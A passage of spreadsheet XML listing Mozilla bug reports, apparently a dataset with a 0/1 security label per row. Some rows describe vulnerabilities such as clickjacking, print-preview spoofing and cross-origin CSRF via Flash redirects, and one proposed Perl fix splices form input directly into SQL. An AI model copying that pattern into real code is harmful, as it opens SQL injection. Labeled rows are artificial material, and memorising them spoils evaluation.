        <v>6</v>
      </c>
      <c r="W651" t="inlineStr">
        <is>
          <t>Make the Alerts view the default instead of Graphs view, as it's the 1st thing we check everyday.</t>
        </is>
      </c>
      <c r="X651" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="652">
      <c r="A652" t="n">
        <v>1387862</v>
      </c>
      <c r="B652" t="inlineStr">
        <is>
          <t>2017-08-06 10:21:22 -0700</t>
        </is>
      </c>
      <c r="C652" t="inlineStr">
        <is>
          <t>We should have CI Lint YAML files in the tree</t>
        </is>
      </c>
      <c r="D652" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:53 -0700</t>
        </is>
      </c>
      <c r="E652" t="n">
        <v>1</v>
      </c>
      <c r="F652" t="n">
        <v>1</v>
      </c>
      <c r="G652" t="n">
        <v>7</v>
      </c>
      <c r="H652" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I652" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J652" t="inlineStr">
        <is>
          <t>Lint and Formatting</t>
        </is>
      </c>
      <c r="K652" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L652" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M652" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N652" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O652" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P652" t="inlineStr"/>
      <c r="Q652" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R652" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S652" t="inlineStr">
        <is>
          <t>mozilla57</t>
        </is>
      </c>
      <c r="T652" t="n">
        <v>1</v>
      </c>
      <c r="U652" t="n">
        <v>0</v>
      </c>
      <c r="V652" t="n">
        <v>56</v>
      </c>
      <c r="W652" t="inlineStr">
        <is>
          <t>We have a lot of .yml files in our tree these days, we should try and be consistent with them, and avoid things like duplicate-keys everywhere.</t>
        </is>
      </c>
      <c r="X652" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="653">
      <c r="A653" t="n">
        <v>1830820</v>
      </c>
      <c r="B653" t="inlineStr">
        <is>
          <t>2023-05-01 18:01:38 -0700</t>
        </is>
      </c>
      <c r="C653" t="inlineStr">
        <is>
          <t>Queued up rendering can allow websites to clickjack</t>
        </is>
      </c>
      <c r="D653" t="inlineStr">
        <is>
          <t>2024-06-02 18:39:49 -0700</t>
        </is>
      </c>
      <c r="E653" t="n">
        <v>1</v>
      </c>
      <c r="F653" t="n">
        <v>1</v>
      </c>
      <c r="G653" t="n">
        <v>3</v>
      </c>
      <c r="H653" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I653" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J653" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K653" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L653" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M653" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N653" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O653" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P653" t="inlineStr">
        <is>
          <t>[adv-main119+][adv-ESR115.4+]</t>
        </is>
      </c>
      <c r="Q653" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R653" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S653" t="inlineStr">
        <is>
          <t>119 Branch</t>
        </is>
      </c>
      <c r="T653" t="n">
        <v>1</v>
      </c>
      <c r="U653" t="n">
        <v>0</v>
      </c>
      <c r="V653" t="n">
        <v>42</v>
      </c>
      <c r="W653" t="inlineStr">
        <is>
          <t>This is a continuation of the general problem in bug 1695986. (bug 1695986 only patched the specific cert page vuln)
Queued rendering or even just too-fast rendering/navigation can allow websites to misdirect clicks into other websites.
For instance, in bug 1695986, we had a case where a malicious page would tell users "click here", queue extra graphics work, and navigate to a bad-cert page. While rendering lagged behind, users were furiously clicking as directed by the malicious page, and these clicks eventually start getting sent to the navigated-to page, which brings up the bad-cert dialog, and the clicks hit "accept". Even in the case where there isn't queued graphics work (which merely makes this more reliable), **we must prevent input events from firing before users can realistically be responding to presented graphics/stimuli.** I believe this is an S2.
In bug 1695986, we mitigated this in one vulnerable page in the browser by waiting (as per our security-delay settings), and also by waiting 10 (rendered requestAnimationFrame) frames for extra measure. We need a (quicker) version of this to happen for at least navigation.
I previously created bug 1783252 to serve as the non-sec-bug whitewashed place to deal with this, but without a blocking bug for that, it's likely to be ignored, so I'm filing this bug to clarify that there's still sec-related things to fix here.
I don't know if this is Layout, DOM:Events or DOM:Navigation. Since I believe this is most closely related to navigation, that's where I'm putting it initially.</t>
        </is>
      </c>
      <c r="X653" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="654">
      <c r="A654" t="n">
        <v>1382561</v>
      </c>
      <c r="B654" t="inlineStr">
        <is>
          <t>2017-07-20 01:15:52 -0700</t>
        </is>
      </c>
      <c r="C654" t="inlineStr">
        <is>
          <t>Sync does not start after email confirmation</t>
        </is>
      </c>
      <c r="D654" t="inlineStr">
        <is>
          <t>2017-10-12 13:40:29 -0700</t>
        </is>
      </c>
      <c r="E654" t="n">
        <v>1</v>
      </c>
      <c r="F654" t="n">
        <v>1</v>
      </c>
      <c r="G654" t="n">
        <v>2</v>
      </c>
      <c r="H654" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I654" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J654" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K654" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L654" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M654" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N654" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O654" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P654" t="inlineStr">
        <is>
          <t>[MobileCore][Sync]</t>
        </is>
      </c>
      <c r="Q654" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R654" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S654" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T654" t="n">
        <v>1</v>
      </c>
      <c r="U654" t="n">
        <v>0</v>
      </c>
      <c r="V654" t="n">
        <v>7</v>
      </c>
      <c r="W654" t="inlineStr">
        <is>
          <t>Build: e14617f7e3
Device: iPad Air 2  
iOS: 10.3.3
Steps to reproduce:
1. Sign in to FxA on iOS Device
2. Go to inbox and confirm the sign in 
Actual results: 
- After confirming the sing in, sync does not start automatically.
Expected result: 
- Sync should be triggered after confirming the sing in.</t>
        </is>
      </c>
      <c r="X654" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="655">
      <c r="A655" t="n">
        <v>1196598</v>
      </c>
      <c r="B655" t="inlineStr">
        <is>
          <t>2015-08-19 19:19:34 -0700</t>
        </is>
      </c>
      <c r="C655" t="inlineStr">
        <is>
          <t>Crash correlations empty since Aug. 13th</t>
        </is>
      </c>
      <c r="D655" t="inlineStr">
        <is>
          <t>2016-01-07 08:24:18 -0800</t>
        </is>
      </c>
      <c r="E655" t="n">
        <v>1</v>
      </c>
      <c r="F655" t="n">
        <v>1</v>
      </c>
      <c r="G655" t="n">
        <v>4</v>
      </c>
      <c r="H655" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I655" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J655" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K655" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L655" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M655" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N655" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O655" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P655" t="inlineStr"/>
      <c r="Q655" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R655" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S655" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T655" t="n">
        <v>1</v>
      </c>
      <c r="U655" t="n">
        <v>0</v>
      </c>
      <c r="V655" t="n">
        <v>24</v>
      </c>
      <c r="W655" t="inlineStr">
        <is>
          <t>All the correlation file sizes are 0-byte.</t>
        </is>
      </c>
      <c r="X655" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="656">
      <c r="A656" t="n">
        <v>1691547</v>
      </c>
      <c r="B656" t="inlineStr">
        <is>
          <t>2021-02-08 13:40:18 -0800</t>
        </is>
      </c>
      <c r="C656" t="inlineStr">
        <is>
          <t>Angle Security Backports for ESR-78</t>
        </is>
      </c>
      <c r="D656" t="inlineStr">
        <is>
          <t>2021-12-16 09:06:04 -0800</t>
        </is>
      </c>
      <c r="E656" t="n">
        <v>1</v>
      </c>
      <c r="F656" t="n">
        <v>1</v>
      </c>
      <c r="G656" t="n">
        <v>3</v>
      </c>
      <c r="H656" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I656" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J656" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K656" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L656" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M656" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N656" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O656" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P656" t="inlineStr">
        <is>
          <t>[adv-main87-][adv-esr78.9+][sec-survey]</t>
        </is>
      </c>
      <c r="Q656" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R656" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S656" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T656" t="n">
        <v>1</v>
      </c>
      <c r="U656" t="n">
        <v>0</v>
      </c>
      <c r="V656" t="n">
        <v>25</v>
      </c>
      <c r="W656" t="inlineStr">
        <is>
          <t>Created attachment 9201897
concerning-commits.txt
I'm trying to figure out what (if any, but seems likely some) issues we should consider backporting to ESR or Beta.
I ran a script that looks at all commits since origin/chromium/3865 (7cf862c9fcd2068a444eef6d4e8a0c1c2170d7f1) and got the following statistics:
```
Summary (4453 Commits Reviewed)
-----------------
Commit Message Keyword: crash: 110 issues identified
Bugtracker: Restricted Bug : 64 issues identified
Commit Message Keyword: ASAN: 15 issues identified
Commit Message Keyword: TSAN: 14 issues identified
Commit Message Keyword: overflow: 13 issues identified
Commit Message Keyword: fuzz: 12 issues identified
Bugtracker Keyword: Security_Severity-High: 4 issues identified
Bugtracker Keyword: Security_Severity-Medium: 3 issues identified
Commit Message Keyword: security: 2 issues identified
Bugtracker Keyword: Security_Impact: 1 issues identified
Commit Message Keyword: MSAN: 1 issues identified
Commit Message Keyword: UBSAN: 1 issues identified
Total: 240
```
I compared it with beta/esr78's cherry-picks file and there were no overlaps (AFAICT - it's possible the sha commit id's may not map exactly because we have our github repo?)  This includes Bug 1676636 because there's nothing that identifies it as a security fix on angle's side :-/
I have to run for the day, but getting this bug on file before I go.</t>
        </is>
      </c>
      <c r="X656" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="657">
      <c r="A657" t="n">
        <v>1436241</v>
      </c>
      <c r="B657" t="inlineStr">
        <is>
          <t>2018-02-06 17:57:43 -0800</t>
        </is>
      </c>
      <c r="C657" t="inlineStr">
        <is>
          <t>Firefox allows flash to follow 307 redirects to other origins with arbitrary content-types</t>
        </is>
      </c>
      <c r="D657" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E657" t="n">
        <v>1</v>
      </c>
      <c r="F657" t="n">
        <v>1</v>
      </c>
      <c r="G657" t="n">
        <v>6</v>
      </c>
      <c r="H657" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I657" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J657" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K657" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L657" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M657" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N657" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O657" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P657" t="inlineStr">
        <is>
          <t>[adv-main61+][adv-esr52.9+][adv-esr60.1+]</t>
        </is>
      </c>
      <c r="Q657" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R657" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S657" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T657" t="n">
        <v>1</v>
      </c>
      <c r="U657" t="n">
        <v>0</v>
      </c>
      <c r="V657" t="n">
        <v>56</v>
      </c>
      <c r="W657" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36
Steps to reproduce:
Used https://github.com/sp1d3r/swf_json_csrf in latest available version of flash to send a post request cross-domain with a non-simple content type.
Actual results:
The request is sent in firefox.
Expected results:
The request should either not be sent or the content-type should not be allowed to be a non-simple content-type without a cors preflight request being made.</t>
        </is>
      </c>
      <c r="X657" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="658">
      <c r="A658" t="n">
        <v>736589</v>
      </c>
      <c r="B658" t="inlineStr">
        <is>
          <t>2012-03-16 13:49:35 -0700</t>
        </is>
      </c>
      <c r="C658" t="inlineStr">
        <is>
          <t>Crash [@ nsDOMStorage::GetNamedItem] with sessionStorage, GC</t>
        </is>
      </c>
      <c r="D658" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E658" t="n">
        <v>1</v>
      </c>
      <c r="F658" t="n">
        <v>1</v>
      </c>
      <c r="G658" t="n">
        <v>3</v>
      </c>
      <c r="H658" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I658" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J658" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K658" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L658" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M658" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N658" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O658" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P658" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q658" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R658" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S658" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T658" t="n">
        <v>1</v>
      </c>
      <c r="U658" t="n">
        <v>0</v>
      </c>
      <c r="V658" t="n">
        <v>28</v>
      </c>
      <c r="W658" t="inlineStr">
        <is>
          <t>Created attachment 606719
testcase (requires extension for GC)
1. Install https://www.squarefree.com/extensions/domFuzzLite3.xpi
2. Load the testcase
3. Click the button
Result: Firefox crashes in one of the following ways:
  [@ nsDOMStorage::GetNamedItem] calling a random address
  [@ nsDOMStorage::CacheStoragePermissions] accessing null</t>
        </is>
      </c>
      <c r="X658" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="659">
      <c r="A659" t="n">
        <v>1301876</v>
      </c>
      <c r="B659" t="inlineStr">
        <is>
          <t>2016-09-10 06:53:23 -0700</t>
        </is>
      </c>
      <c r="C659" t="inlineStr">
        <is>
          <t>Print preview hijacking leads to potential spoof</t>
        </is>
      </c>
      <c r="D659" t="inlineStr">
        <is>
          <t>2017-10-26 19:05:35 -0700</t>
        </is>
      </c>
      <c r="E659" t="n">
        <v>1</v>
      </c>
      <c r="F659" t="n">
        <v>1</v>
      </c>
      <c r="G659" t="n">
        <v>3</v>
      </c>
      <c r="H659" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I659" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J659" t="inlineStr">
        <is>
          <t>Print Preview</t>
        </is>
      </c>
      <c r="K659" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L659" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M659" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N659" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O659" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P659" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main52+]</t>
        </is>
      </c>
      <c r="Q659" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R659" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S659" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T659" t="n">
        <v>1</v>
      </c>
      <c r="U659" t="n">
        <v>0</v>
      </c>
      <c r="V659" t="n">
        <v>27</v>
      </c>
      <c r="W659" t="inlineStr">
        <is>
          <t>Created attachment 8790024
PoC-print.html
User Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36
Firefox for Android
Steps to reproduce:
This requires popups to be allowed. If we open a url within onbeforeprint event, we can trick a victim into thinking theyre in a trusted website.
Open attached PoC and follow instructions.
Actual results:
We are able to hijack the print preview window with any HTML and javascript we like. 
Expected results:
New content should have been blocked, as usually print preview has no javascript in it. But having these active contents might be a problem.</t>
        </is>
      </c>
      <c r="X659" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="660">
      <c r="A660" t="n">
        <v>1413043</v>
      </c>
      <c r="B660" t="inlineStr">
        <is>
          <t>2017-10-30 16:53:54 -0700</t>
        </is>
      </c>
      <c r="C660" t="inlineStr">
        <is>
          <t>Various test suites are going to permafail when Gecko 58 merges to Beta on 2017-11-02 due to WebRender asserts</t>
        </is>
      </c>
      <c r="D660" t="inlineStr">
        <is>
          <t>2017-11-06 07:44:02 -0800</t>
        </is>
      </c>
      <c r="E660" t="n">
        <v>1</v>
      </c>
      <c r="F660" t="n">
        <v>1</v>
      </c>
      <c r="G660" t="n">
        <v>3</v>
      </c>
      <c r="H660" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I660" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J660" t="inlineStr">
        <is>
          <t>Graphics: WebRender</t>
        </is>
      </c>
      <c r="K660" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L660" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M660" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N660" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O660" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P660" t="inlineStr">
        <is>
          <t>[wr-reserve]</t>
        </is>
      </c>
      <c r="Q660" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R660" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S660" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T660" t="n">
        <v>1</v>
      </c>
      <c r="U660" t="n">
        <v>0</v>
      </c>
      <c r="V660" t="n">
        <v>16</v>
      </c>
      <c r="W660" t="inlineStr">
        <is>
          <t>[Tracking Requested - why for this release]: Lots of broken tests on the next merge day.
Not sure yet which of the recent changes to webrender_ffi_generated.h caused this, but it's breaking a number of tests at the moment. The merge to Beta is on Thursday, so this needs attention ASAP.
https://treeherder.mozilla.org/logviewer.html#?job_id=140880543&amp;repo=try&amp;lineNumber=33309
Assertion failure: false (MOZ_ASSERT_UNREACHABLE: WebRender disabled), at /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/webrender/webrender_ffi_generated.h:1481</t>
        </is>
      </c>
      <c r="X660" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="661">
      <c r="A661" t="n">
        <v>652687</v>
      </c>
      <c r="B661" t="inlineStr">
        <is>
          <t>2011-04-25 15:52:17 -0700</t>
        </is>
      </c>
      <c r="C661" t="inlineStr">
        <is>
          <t>Moving a file in the tree opens it in a tab on drop, if it is in a tab already it duplicates</t>
        </is>
      </c>
      <c r="D661" t="inlineStr">
        <is>
          <t>2014-09-24 06:39:12 -0700</t>
        </is>
      </c>
      <c r="E661" t="n">
        <v>1</v>
      </c>
      <c r="F661" t="n">
        <v>1</v>
      </c>
      <c r="G661" t="n">
        <v>6</v>
      </c>
      <c r="H661" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I661" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J661" t="inlineStr">
        <is>
          <t>Add-on Builder</t>
        </is>
      </c>
      <c r="K661" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L661" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M661" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N661" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O661" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P661" t="inlineStr"/>
      <c r="Q661" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R661" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S661" t="inlineStr">
        <is>
          <t>Builder 0.9.3</t>
        </is>
      </c>
      <c r="T661" t="n">
        <v>1</v>
      </c>
      <c r="U661" t="n">
        <v>0</v>
      </c>
      <c r="V661" t="n">
        <v>5</v>
      </c>
      <c r="W661" t="inlineStr">
        <is>
          <t>When you drag a file to a new location in the tree, it will open the file as a part of the drop event mouseup. If the file in question is already open in the tab strip, a duplicate tab will be created.</t>
        </is>
      </c>
      <c r="X661" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="662">
      <c r="A662" t="n">
        <v>66235</v>
      </c>
      <c r="B662" t="inlineStr">
        <is>
          <t>2001-01-22 17:12:47 -0800</t>
        </is>
      </c>
      <c r="C662" t="inlineStr">
        <is>
          <t>process_bug.cgi: multiple product change misses the groupset bit</t>
        </is>
      </c>
      <c r="D662" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:23 -0800</t>
        </is>
      </c>
      <c r="E662" t="n">
        <v>1</v>
      </c>
      <c r="F662" t="n">
        <v>1</v>
      </c>
      <c r="G662" t="n">
        <v>4</v>
      </c>
      <c r="H662" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I662" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J662" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K662" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L662" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M662" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N662" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O662" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P662" t="inlineStr"/>
      <c r="Q662" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R662" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S662" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T662" t="n">
        <v>1</v>
      </c>
      <c r="U662" t="n">
        <v>0</v>
      </c>
      <c r="V662" t="n">
        <v>27</v>
      </c>
      <c r="W662" t="inlineStr">
        <is>
          <t>When mass editing multiple bugs, the process_bug.cgi script changes the product
name (ane components) from the old to the new, but it fails to set the
'groupset' bit to the new product's group bit.
There are several places to fix it, I added the following right around line
359/360 (from v2.10, inside the "foreach my $field..." loop):
if (defined $::FORM{'product'}) {
  my $name = trim($::FORM{'product'});
  if (($name ne $::dontchange) &amp;&amp; ($name ne "")) {
    ConnectToDatabase();
    SendSQL("select bit from groups where name = '$name'");
    my $bit = FetchOneColumn();
    if (defined $bit) {
      DoComma();
      $::query .= "groupset = $bit";
    }
  }
}</t>
        </is>
      </c>
      <c r="X662" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="663">
      <c r="A663" t="n">
        <v>414092</v>
      </c>
      <c r="B663" t="inlineStr">
        <is>
          <t>2008-01-25 19:06:24 -0800</t>
        </is>
      </c>
      <c r="C663" t="inlineStr">
        <is>
          <t>crash at _moz_pixman_image_fill_rectangles</t>
        </is>
      </c>
      <c r="D663" t="inlineStr">
        <is>
          <t>2009-11-03 15:51:55 -0800</t>
        </is>
      </c>
      <c r="E663" t="n">
        <v>1</v>
      </c>
      <c r="F663" t="n">
        <v>1</v>
      </c>
      <c r="G663" t="n">
        <v>3</v>
      </c>
      <c r="H663" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I663" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J663" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K663" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L663" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M663" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N663" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O663" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P663" t="inlineStr"/>
      <c r="Q663" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R663" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S663" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T663" t="n">
        <v>1</v>
      </c>
      <c r="U663" t="n">
        <v>0</v>
      </c>
      <c r="V663" t="n">
        <v>12</v>
      </c>
      <c r="W663" t="inlineStr">
        <is>
          <t>boxes = pixman_region_rectangles (&amp;fill_region, &amp;n_boxes);
(gdb) fin
Run till exit from #0  _moz_pixman_region_rectangles (region=0x7fffb3134d10, 
    n_rects=0x7fffb3134d0c)
    at /home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-region.c:361
0x00002aaaab8b4aac in _moz_pixman_image_fill_rectangles (op=PIXMAN_OP_SRC, 
    dest=0x1280e90, color=0x7fffb3134d30, n_rects=1, rects=0x7fffb3134db0)
    at /home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c:688
Value returned is $17 = (pixman_box16_t *) 0x7fffb3134d10
(gdb) n
(gdb) p boxes
$18 = (pixman_box16_t *) 0xffffffffb3134d10
obj/gfx/cairo/libpixman/src% make pixman-image.o
Updating dependencies file, .deps/.all.pp
pixman-image.c
